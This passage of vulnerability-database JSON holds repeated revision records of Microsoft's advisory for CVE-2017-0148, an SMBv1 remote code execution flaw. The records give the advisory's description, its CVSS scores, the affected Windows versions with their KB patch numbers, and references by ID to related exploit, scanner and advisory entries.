"KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-12T20:49:50", "differentElements": ["msAffectedSoftware"], "edition": 39}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-12T22:47:20", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KB3210720", "KB3205401", "KB4013198", "KB4012216", "KB3205409", "KB3212646", "KB3213986", "KB4012213", "KBMS16-110, 3187754", "KB4012212", "KB4012598", "KB4012606", "KB4012217", "KB4013429", "KB4012214", "KB3177186", "KB3210721"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-12T22:47:20", "differentElements": ["msAffectedSoftware"], "edition": 40}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-13T00:46:29", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210721", "KB4012214", "KB4012212", "KB3210720", "KB4013198", "KB3212646", "KB3177186", "KB4012216", "KB3205401", "KB4013429", "KB4012213", "KB3205409", "KB4012598", "KB4012606", "KB4012217", "KB3213986", "KB4012215", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", 